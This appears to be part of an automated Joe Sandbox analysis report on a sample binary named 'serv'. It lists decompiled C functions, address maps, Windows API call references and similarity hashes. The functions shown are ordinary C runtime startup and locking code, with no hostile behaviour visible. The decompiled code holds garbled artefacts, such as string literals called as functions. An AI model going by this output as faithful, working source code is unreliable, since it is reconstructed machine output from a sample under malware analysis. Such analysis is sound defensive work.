                                                                    • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00429AD9
                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 00429B1F
                                                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 00429B5D
                                                                    • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 00429B83
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                    • String ID:
                                                                    • API String ID: 4136887677-0
                                                                    • Opcode ID: 9cd3f58e9d8f2c8c9c2aa7743a2e64f61b892e13c6dcf7f6dc1128023b321f3b
                                                                    • Instruction ID: d0dcd18c624419727a87dcc28abbffd8387f74cd09c14b7bced18c3b25ffbc94
                                                                    • Opcode Fuzzy Hash: 9cd3f58e9d8f2c8c9c2aa7743a2e64f61b892e13c6dcf7f6dc1128023b321f3b
                                                                    • Instruction Fuzzy Hash: 0A31A232E00229EBCF10CBA4ED54AEDBF78FB08714F541166E941E3190D675AE40DB98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 75%
                                                                    			E00423BDF() {
                                                                    				void* __ebx;
                                                                    				void* __esi;
                                                                    				long _t5;
                                                                    				long _t7;
                                                                    				long _t9;
                                                                    				long _t10;
                                                                    				void* _t14;
                                                                    				long _t15;
                                                                    
                                                                    				_t5 = GetLastError();
                                                                    				_push( *0x446f28);
                                                                    				_t10 = _t5;
                                                                    				"PHqtpHqt0Hqt"();
                                                                    				_t15 = _t5;
                                                                    				_t16 = _t15;
                                                                    				if(_t15 == 0) {
                                                                    					_push(0x8c);
                                                                    					_push(1);
                                                                    					_t7 = E00427472(_t10, _t14, _t15, _t16);
                                                                    					_t15 = _t7;
                                                                    					if(_t15 == 0) {
                                                                    						L4:
                                                                    						E00422C26(0x10);
                                                                    					} else {
                                                                    						_push(_t15);
                                                                    						_push( *0x446f28);
                                                                    						"pHqt0Hqt"();
                                                                    						if(_t7 == 0) {
                                                                    							goto L4;
                                                                    						} else {
                                                                    							 *((intOrPtr*)(_t15 + 0x54)) = 0x447678;
                                                                    							 *((intOrPtr*)(_t15 + 0x14)) = 1;
                                                                    							_t9 = GetCurrentThreadId();
                                                                    							 *(_t15 + 4) =  *(_t15 + 4) | 0xffffffff;
                                                                    							 *_t15 = _t9;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				SetLastError(_t10);
                                                                    				return _t15;
                                                                    			}











                                                                    0x00423be1
                                                                    0x00423be7
                                                                    0x00423bed
                                                                    0x00423bef
                                                                    0x00423bf5
                                                                    0x00423bf7
                                                                    0x00423bf9
                                                                    0x00423bfb
                                                                    0x00423c00
                                                                    0x00423c02
                                                                    0x00423c07
                                                                    0x00423c0d
                                                                    0x00423c3c
                                                                    0x00423c3e
                                                                    0x00423c0f
                                                                    0x00423c0f
                                                                    0x00423c10
                                                                    0x00423c16
                                                                    0x00423c1e
                                                                    0x00000000
                                                                    0x00423c20
                                                                    0x00423c20
                                                                    0x00423c27
                                                                    0x00423c2e
                                                                    0x00423c34
                                                                    0x00423c38
                                                                    0x00423c38
                                                                    0x00423c1e
                                                                    0x00423c0d
                                                                    0x00423c45
                                                                    0x00423c4f

                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,00000000,0042685B,004241BD,00000000,00430490,00000008,00424214,?,?,?,00422781,00000004,00430358,0000000C,00424114), ref: 00423BE1
                                                                    • FlsGetValue.KERNEL32(?,00422781,00000004,00430358,0000000C,00424114,00000000,?,00423E81,?,004303A8,00000060), ref: 00423BEF
                                                                    • SetLastError.KERNEL32(00000000,?,00422781,00000004,00430358,0000000C,00424114,00000000,?,00423E81,?,004303A8,00000060), ref: 00423C45
                                                                      • Part of subcall function 00427472: __lock.LIBCMT ref: 004274B6
                                                                      • Part of subcall function 00427472: RtlAllocateHeap.NTDLL(00000008,?,00430B60), ref: 004274F4
                                                                    • FlsSetValue.KERNEL32(00000000,?,00422781,00000004,00430358,0000000C,00424114,00000000,?,00423E81,?,004303A8,00000060), ref: 00423C16
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00423C2E
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue$AllocateCurrentHeapThread__lock
                                                                    • String ID:
                                                                    • API String ID: 1487844433-0
                                                                    • Opcode ID: c36c40087d43799878c3647ab0fb0f45bd7bed6d8916e5c34953dbc2e19d5338
                                                                    • Instruction ID: 633b9cc39e93b5ce6e34e234b303751ae9900a93f108d93fc5aa3b6252269568
                                                                    • Opcode Fuzzy Hash: c36c40087d43799878c3647ab0fb0f45bd7bed6d8916e5c34953dbc2e19d5338
                                                                    • Instruction Fuzzy Hash: 66F0C8363017219BD3342F61BD0970ABAB0EB01762B514629E591A62A1DBB88C444B5C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00429BEE() {
                                                                    				struct _FILETIME _v12;
                                                                    				signed int _v16;
                                                                    				union _LARGE_INTEGER _v20;
                                                                    				signed int _t7;
                                                                    				signed int _t9;
                                                                    				signed int _t10;
                                                                    				signed int _t11;
                                                                    				signed int _t15;
                                                                    				signed int _t22;
                                                                    
                                                                    				_t7 =  *0x446f24; // 0x81a0b55c
                                                                    				if(_t7 == 0 || _t7 == 0xbb40e64e) {
                                                                    					GetSystemTimeAsFileTime( &_v12);
                                                                    					_t9 = GetCurrentProcessId();
                                                                    					_t10 = GetCurrentThreadId();
                                                                    					_t11 = GetTickCount();
                                                                    					QueryPerformanceCounter( &_v20);
                                                                    					_t15 = _v16 ^ _v20.LowPart;
                                                                    					_t22 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t9 ^ _t10 ^ _t11 ^ _t15;
                                                                    					 *0x446f24 = _t22;
                                                                    					if(_t22 == 0) {
                                                                    						 *0x446f24 = 0xbb40e64e;
                                                                    					}
                                                                    					return _t15;
                                                                    				}
                                                                    				return _t7;
                                                                    			}












                                                                    0x00429bf4
                                                                    0x00429bfb
                                                                    0x00429c09
                                                                    0x00429c15
                                                                    0x00429c1d
                                                                    0x00429c25
                                                                    0x00429c31
                                                                    0x00429c3a
                                                                    0x00429c3d
                                                                    0x00429c3f
                                                                    0x00429c45
                                                                    0x00429c47
                                                                    0x00429c47
                                                                    0x00000000
                                                                    0x00429c51
                                                                    0x00429c53

                                                                    APIs
                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00429C09
                                                                    • GetCurrentProcessId.KERNEL32 ref: 00429C15
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00429C1D
                                                                    • GetTickCount.KERNEL32 ref: 00429C25
                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00429C31
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                    • String ID:
                                                                    • API String ID: 1445889803-0
                                                                    • Opcode ID: fb65a2dc32d3fd81b4879bdf6826c35e285d0c3fa8f5780a6870f9eba52af9f3
                                                                    • Instruction ID: cf895ea1c6de8500e18015c1e7b66bb1a140f48cb24875eab0e156f085952eee
                                                                    • Opcode Fuzzy Hash: fb65a2dc32d3fd81b4879bdf6826c35e285d0c3fa8f5780a6870f9eba52af9f3
                                                                    • Instruction Fuzzy Hash: C9F09776D002249BCF209FB5F94859ABBF8BB0D344B820665D855E7214EA35A9048B99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 87%
                                                                    			E00421B39(void* __eflags) {
                                                                    				void* _t30;
                                                                    				void* _t32;
                                                                    				intOrPtr* _t36;
                                                                    				void* _t38;
                                                                    				void* _t39;
                                                                    				void* _t40;
                                                                    				void* _t44;
                                                                    
                                                                    				_t44 = __eflags;
                                                                    				E004232F0(E0042FE7A, _t40);
                                                                    				_t1 = _t40 - 0x28; // 0xb4
                                                                    				E00402A60(_t1, "invalid string position");
                                                                    				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
                                                                    				_t4 = _t40 - 0x28; // 0xb4
                                                                    				_t5 = _t40 - 0x50; // 0x8c
                                                                    				E004029A0(_t5, _t44, _t4);
                                                                    				_t6 = _t40 - 0x50; // 0x8c
                                                                    				 *((intOrPtr*)(_t40 - 0x50)) = 0x4302b4;
                                                                    				E0042246E(_t6, 0x4326d4);
                                                                    				asm("int3");
                                                                    				E004232F0(E0042FE7A, _t40);
                                                                    				_t8 = _t40 - 0x28; // 0xb4
                                                                    				E00402A60(_t8, "string too long");
                                                                    				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
                                                                    				_t11 = _t40 - 0x28; // 0xb4
                                                                    				_t12 = _t40 - 0x50; // 0x8c
                                                                    				_t36 = _t12;
                                                                    				E004029A0(_t36, _t44, _t11);
                                                                    				_t13 = _t40 - 0x50; // 0xb4
                                                                    				 *((intOrPtr*)(_t40 - 0x50)) = 0x4302a8;
                                                                    				_t30 = E0042246E(_t13, 0x432674);
                                                                    				asm("int3");
                                                                    				 *_t36 = 0x4302e8;
                                                                    				_t45 =  *((intOrPtr*)(_t36 + 8));
                                                                    				 *_t36 = 0x430324;
                                                                    				if( *((intOrPtr*)(_t36 + 8)) != 0) {
                                                                    					_push( *((intOrPtr*)(_t36 + 4)));
                                                                    					return E0042275E(_t32, _t38, _t39, _t45);
                                                                    				}
                                                                    				return _t30;
                                                                    			}










                                                                    0x00421b39
                                                                    0x00421b3e
                                                                    0x00421b4b
                                                                    0x00421b4e
                                                                    0x00421b53
                                                                    0x00421b57
                                                                    0x00421b5b
                                                                    0x00421b5e
                                                                    0x00421b68
                                                                    0x00421b6c
                                                                    0x00421b73
                                                                    0x00421b78
                                                                    0x00421b7e
                                                                    0x00421b8b
                                                                    0x00421b8e
                                                                    0x00421b93
                                                                    0x00421b97
                                                                    0x00421b9b
                                                                    0x00421b9b
                                                                    0x00421b9e
                                                                    0x00421ba8
                                                                    0x00421bac
                                                                    0x00421bb3
                                                                    0x00421bb8
                                                                    0x00421bb9
                                                                    0x00422540
                                                                    0x00422544
                                                                    0x0042254a
                                                                    0x0042254c
                                                                    0x00000000
                                                                    0x00422554
                                                                    0x00422555

                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00421B3E
                                                                      • Part of subcall function 0042246E: RaiseException.KERNEL32(?,?,000000FF,00432DF4,00000000,004302E8,?,?,?,00421C58,000000FF,00432DF4,004480D0,?,000000FF,004136B9), ref: 0042249C
                                                                    • __EH_prolog.LIBCMT ref: 00421B7E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog$ExceptionRaise
                                                                    • String ID: invalid string position$string too long
                                                                    • API String ID: 2062786585-4289949731
                                                                    • Opcode ID: 53f02b49fc375bbb6fd58ab0069bd16c8d38f124c368bef8e055f681e02ecebb
                                                                    • Instruction ID: b2d8ccf0adb99a0b6271aa405870c6bceeea0f971fd0891507c1645c33ecb31b
                                                                    • Opcode Fuzzy Hash: 53f02b49fc375bbb6fd58ab0069bd16c8d38f124c368bef8e055f681e02ecebb
                                                                    • Instruction Fuzzy Hash: D5F01DB1A00218ABC704FBE5D95ABDEB778AF18318F90516BE001B1495DBFC5B088B69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 73%
                                                                    			E00428BF3(signed int* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				signed int _t48;
                                                                    				signed int _t49;
                                                                    				signed int _t53;
                                                                    				signed int _t54;
                                                                    				signed int _t61;
                                                                    				signed int* _t73;
                                                                    				signed int _t75;
                                                                    				signed int _t87;
                                                                    				signed int _t88;
                                                                    				signed int* _t90;
                                                                    				void* _t92;
                                                                    				void* _t93;
                                                                    
                                                                    				_t93 = __eflags;
                                                                    				_t68 = __ebx;
                                                                    				_push(0x14);
                                                                    				_push(0x431238);
                                                                    				E0042422C(__ebx, __edi, __esi);
                                                                    				 *(_t92 - 0x1c) =  *(_t92 - 0x1c) | 0xffffffff;
                                                                    				_push(0xb);
                                                                    				_t48 = E0042415B(__ebx, __edi, __esi, _t93);
                                                                    				if(_t48 == 0) {
                                                                    					L10:
                                                                    					_t49 = _t48 | 0xffffffff;
                                                                    					L26:
                                                                    					return E00424267(_t49);
                                                                    				}
                                                                    				E004241FB(__ebx, __edi, 0xb);
                                                                    				_t87 = 0;
                                                                    				 *(_t92 - 4) = 0;
                                                                    				while(1) {
                                                                    					 *(_t92 - 0x24) = _t87;
                                                                    					if(_t87 >= 0x40) {
                                                                    						break;
                                                                    					}
                                                                    					_t90 =  *(0x44b140 + _t87 * 4);
                                                                    					if(_t90 == 0) {
                                                                    						_t53 = E00422EEB(0x480);
                                                                    						 *(_t92 - 0x20) = _t53;
                                                                    						__eflags = _t53;
                                                                    						if(_t53 == 0) {
                                                                    							break;
                                                                    						}
                                                                    						_t73 = 0x44b140 + _t87 * 4;
                                                                    						 *_t73 = _t53;
                                                                    						 *0x44b120 =  *0x44b120 + 0x20;
                                                                    						__eflags =  *0x44b120;
                                                                    						while(1) {
                                                                    							__eflags = _t53 -  *_t73 + 0x480;
                                                                    							if(__eflags >= 0) {
                                                                    								break;
                                                                    							}
                                                                    							 *((char*)(_t53 + 4)) = 0;
                                                                    							 *_t53 =  *_t53 | 0xffffffff;
                                                                    							 *((char*)(_t53 + 5)) = 0xa;
                                                                    							 *(_t53 + 8) =  *(_t53 + 8) & 0x00000000;
                                                                    							_t53 = _t53 + 0x24;
                                                                    							 *(_t92 - 0x20) = _t53;
                                                                    						}
                                                                    						_t88 = _t87 << 5;
                                                                    						 *(_t92 - 0x1c) = _t88;
                                                                    						_push(_t88);
                                                                    						_t54 = E00428B31(_t68, _t88, 0x480, __eflags);
                                                                    						__eflags = _t54;
                                                                    						if(_t54 == 0) {
                                                                    							_t42 = _t92 - 0x1c;
                                                                    							 *_t42 =  *(_t92 - 0x1c) | 0xffffffff;
                                                                    							__eflags =  *_t42;
                                                                    						}
                                                                    						break;
                                                                    					} else {
                                                                    						goto L4;
                                                                    					}
                                                                    					while(1) {
                                                                    						L4:
                                                                    						 *(_t92 - 0x20) = _t90;
                                                                    						if(_t90 >=  &(( *(0x44b140 + _t87 * 4))[0x120])) {
                                                                    							break;
                                                                    						}
                                                                    						if((_t90[1] & 0x00000001) != 0) {
                                                                    							L15:
                                                                    							_t90 =  &(_t90[9]);
                                                                    							continue;
                                                                    						}
                                                                    						if(_t90[2] != 0) {
                                                                    							L13:
                                                                    							_t21 =  &(_t90[3]); // 0x8c
                                                                    							_t68 = _t21;
                                                                    							 *0x43008c(_t68);
                                                                    							__eflags = _t90[1] & 0x00000001;
                                                                    							if((_t90[1] & 0x00000001) == 0) {
                                                                    								 *_t90 =  *_t90 | 0xffffffff;
                                                                    								asm("cdq");
                                                                    								_t75 = 0x24;
                                                                    								_t61 = (_t90 -  *(0x44b140 + _t87 * 4)) / _t75 + (_t87 << 5);
                                                                    								__eflags = _t61;
                                                                    								 *(_t92 - 0x1c) = _t61;
                                                                    								break;
                                                                    							}
                                                                    							 *0x430088(_t68);
                                                                    							goto L15;
                                                                    						}
                                                                    						E004241FB(0, _t87, 0xa);
                                                                    						 *(_t92 - 4) = 1;
                                                                    						_t101 = _t90[2];
                                                                    						if(_t90[2] != 0) {
                                                                    							L12:
                                                                    							 *(_t92 - 4) = 0;
                                                                    							E00428CCC();
                                                                    							goto L13;
                                                                    						}
                                                                    						_push(0xfa0);
                                                                    						_t16 =  &(_t90[3]); // 0x8c
                                                                    						if(E00427A37(_t101) != 0) {
                                                                    							_t18 =  &(_t90[2]);
                                                                    							 *_t18 = _t90[2] + 1;
                                                                    							__eflags =  *_t18;
                                                                    							goto L12;
                                                                    						}
                                                                    						_t48 = E004223C2(_t92 - 0x10, 0xffffffff);
                                                                    						goto L10;
                                                                    					}
                                                                    					__eflags =  *(_t92 - 0x1c) - 0xffffffff;
                                                                    					if( *(_t92 - 0x1c) != 0xffffffff) {
                                                                    						break;
                                                                    					}
                                                                    					_t87 = _t87 + 1;
                                                                    				}
                                                                    				_t44 = _t92 - 4;
                                                                    				 *_t44 =  *(_t92 - 4) | 0xffffffff;
                                                                    				__eflags =  *_t44;
                                                                    				E00428D66();
                                                                    				_t49 =  *(_t92 - 0x1c);
                                                                    				goto L26;
                                                                    			}















                                                                    0x00428bf3
                                                                    0x00428bf3
                                                                    0x00428bf3
                                                                    0x00428bf5
                                                                    0x00428bfa
                                                                    0x00428bff
                                                                    0x00428c03
                                                                    0x00428c05
                                                                    0x00428c0d
                                                                    0x00428c94
                                                                    0x00428c94
                                                                    0x00428d60
                                                                    0x00428d65
                                                                    0x00428d65
                                                                    0x00428c15
                                                                    0x00428c1b
                                                                    0x00428c1d
                                                                    0x00428c20
                                                                    0x00428c20
                                                                    0x00428c26
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428c2c
                                                                    0x00428c35
                                                                    0x00428d03
                                                                    0x00428d09
                                                                    0x00428d0c
                                                                    0x00428d0e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428d10
                                                                    0x00428d17
                                                                    0x00428d19
                                                                    0x00428d19
                                                                    0x00428d20
                                                                    0x00428d24
                                                                    0x00428d26
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428d28
                                                                    0x00428d2c
                                                                    0x00428d2f
                                                                    0x00428d33
                                                                    0x00428d37
                                                                    0x00428d3a
                                                                    0x00428d3a
                                                                    0x00428d3f
                                                                    0x00428d42
                                                                    0x00428d45
                                                                    0x00428d46
                                                                    0x00428d4c
                                                                    0x00428d4e
                                                                    0x00428d50
                                                                    0x00428d50
                                                                    0x00428d50
                                                                    0x00428d50
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428c3b
                                                                    0x00428c3b
                                                                    0x00428c3b
                                                                    0x00428c4c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428c56
                                                                    0x00428cbe
                                                                    0x00428cbe
                                                                    0x00000000
                                                                    0x00428cbe
                                                                    0x00428c5d
                                                                    0x00428ca7
                                                                    0x00428ca7
                                                                    0x00428ca7
                                                                    0x00428cab
                                                                    0x00428cb1
                                                                    0x00428cb5
                                                                    0x00428cd5
                                                                    0x00428ce1
                                                                    0x00428ce4
                                                                    0x00428cec
                                                                    0x00428cec
                                                                    0x00428cee
                                                                    0x00000000
                                                                    0x00428cee
                                                                    0x00428cb8
                                                                    0x00000000
                                                                    0x00428cb8
                                                                    0x00428c61
                                                                    0x00428c67
                                                                    0x00428c6e
                                                                    0x00428c71
                                                                    0x00428c9f
                                                                    0x00428c9f
                                                                    0x00428ca2
                                                                    0x00000000
                                                                    0x00428ca2
                                                                    0x00428c73
                                                                    0x00428c78
                                                                    0x00428c85
                                                                    0x00428c9c
                                                                    0x00428c9c
                                                                    0x00428c9c
                                                                    0x00000000
                                                                    0x00428c9c
                                                                    0x00428c8d
                                                                    0x00000000
                                                                    0x00428c93
                                                                    0x00428cf1
                                                                    0x00428cf5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428cf7
                                                                    0x00428cf7
                                                                    0x00428d54
                                                                    0x00428d54
                                                                    0x00428d54
                                                                    0x00428d58
                                                                    0x00428d5d
                                                                    0x00000000

                                                                    APIs
                                                                    • __lock.LIBCMT ref: 00428C15
                                                                      • Part of subcall function 004241FB: RtlEnterCriticalSection.NTDLL(?), ref: 00424223
                                                                    • __lock.LIBCMT ref: 00428C61
                                                                    • RtlEnterCriticalSection.NTDLL(0000008C), ref: 00428CAB
                                                                    • RtlLeaveCriticalSection.NTDLL(0000008C), ref: 00428CB8
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$Enter__lock$Leave
                                                                    • String ID:
                                                                    • API String ID: 885841014-0
                                                                    • Opcode ID: 6fae6486e4c9574baf78ee052790d32407c79e9a8d57aadb6baaf88539f95d67
                                                                    • Instruction ID: 38b0a141d8fc7cec0bb9b8a043e1b863c23aac017dab17fe744d6ac09379721b
                                                                    • Opcode Fuzzy Hash: 6fae6486e4c9574baf78ee052790d32407c79e9a8d57aadb6baaf88539f95d67
                                                                    • Instruction Fuzzy Hash: 74414871A023268AC7109F76F84576E77A0AF11378F60821FE061A62D1CF7C95418B2C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 95%
                                                                    			E00426DA5() {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed int _t5;
                                                                    				signed int _t6;
                                                                    				signed int _t11;
                                                                    				signed int _t12;
                                                                    				signed int _t13;
                                                                    				signed int _t24;
                                                                    				signed int _t25;
                                                                    				signed int _t26;
                                                                    				signed int _t27;
                                                                    				void* _t30;
                                                                    
                                                                    				if( *0x44c270 == 0) {
                                                                    					_t5 = E004279F1();
                                                                    				}
                                                                    				_t26 =  *0x4480e0; // 0x0
                                                                    				_t24 = 0;
                                                                    				if(_t26 != 0) {
                                                                    					while(1) {
                                                                    						_t6 =  *_t26;
                                                                    						__eflags = _t6;
                                                                    						if(_t6 == 0) {
                                                                    							break;
                                                                    						}
                                                                    						__eflags = _t6 - 0x3d;
                                                                    						if(_t6 != 0x3d) {
                                                                    							_t24 = _t24 + 1;
                                                                    							__eflags = _t24;
                                                                    						}
                                                                    						_t26 = _t26 + E00422F20(_t26) + 1;
                                                                    					}
                                                                    					_t5 = E00422EEB(4 + _t24 * 4);
                                                                    					_t25 = _t5;
                                                                    					__eflags = _t25;
                                                                    					 *0x448288 = _t25;
                                                                    					if(_t25 != 0) {
                                                                    						_t27 =  *0x4480e0; // 0x0
                                                                    						while(1) {
                                                                    							__eflags =  *_t27;
                                                                    							if(__eflags == 0) {
                                                                    								break;
                                                                    							}
                                                                    							_t30 = E00422F20(_t27) + 1;
                                                                    							__eflags =  *_t27 - 0x3d;
                                                                    							if( *_t27 == 0x3d) {
                                                                    								L14:
                                                                    								_t27 = _t27 + _t30;
                                                                    								__eflags = _t27;
                                                                    								continue;
                                                                    							}
                                                                    							_t12 = E00422EEB(_t30);
                                                                    							__eflags = _t12;
                                                                    							 *_t25 = _t12;
                                                                    							if(__eflags == 0) {
                                                                    								_push( *0x448288);
                                                                    								_t13 = E0042275E(0, _t25, _t27, __eflags);
                                                                    								 *0x448288 = 0;
                                                                    								_t11 = _t13 | 0xffffffff;
                                                                    								L17:
                                                                    								return _t11;
                                                                    							}
                                                                    							E00423FB0(_t12, _t27);
                                                                    							_t25 = _t25 + 4;
                                                                    							__eflags = _t25;
                                                                    							goto L14;
                                                                    						}
                                                                    						_push( *0x4480e0);
                                                                    						E0042275E(0, _t25, _t27, __eflags);
                                                                    						 *0x4480e0 = 0;
                                                                    						 *_t25 = 0;
                                                                    						 *0x44c264 = 1;
                                                                    						_t11 = 0;
                                                                    						__eflags = 0;
                                                                    						goto L17;
                                                                    					}
                                                                    					goto L9;
                                                                    				} else {
                                                                    					L9:
                                                                    					return _t5 | 0xffffffff;
                                                                    				}
                                                                    			}

















                                                                    0x00426db0
                                                                    0x00426db2
                                                                    0x00426db2
                                                                    0x00426db7
                                                                    0x00426dbd
                                                                    0x00426dc1
                                                                    0x00426dd5
                                                                    0x00426dd5
                                                                    0x00426dd7
                                                                    0x00426dd9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00426dc5
                                                                    0x00426dc7
                                                                    0x00426dc9
                                                                    0x00426dc9
                                                                    0x00426dc9
                                                                    0x00426dd1
                                                                    0x00426dd1
                                                                    0x00426de3
                                                                    0x00426de8
                                                                    0x00426dea
                                                                    0x00426ded
                                                                    0x00426df3
                                                                    0x00426dfa
                                                                    0x00426e2d
                                                                    0x00426e2d
                                                                    0x00426e2f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00426e0b
                                                                    0x00426e0c
                                                                    0x00426e10
                                                                    0x00426e2b
                                                                    0x00426e2b
                                                                    0x00426e2b
                                                                    0x00000000
                                                                    0x00426e2b
                                                                    0x00426e13
                                                                    0x00426e18
                                                                    0x00426e1b
                                                                    0x00426e1d
                                                                    0x00426e56
                                                                    0x00426e5c
                                                                    0x00426e61
                                                                    0x00426e67
                                                                    0x00426e50
                                                                    0x00000000
                                                                    0x00426e51
                                                                    0x00426e21
                                                                    0x00426e28
                                                                    0x00426e28
                                                                    0x00000000
                                                                    0x00426e28
                                                                    0x00426e31
                                                                    0x00426e37
                                                                    0x00426e3c
                                                                    0x00426e42
                                                                    0x00426e44
                                                                    0x00426e4e
                                                                    0x00426e4e
                                                                    0x00000000
                                                                    0x00426e4e
                                                                    0x00000000
                                                                    0x00426dc3
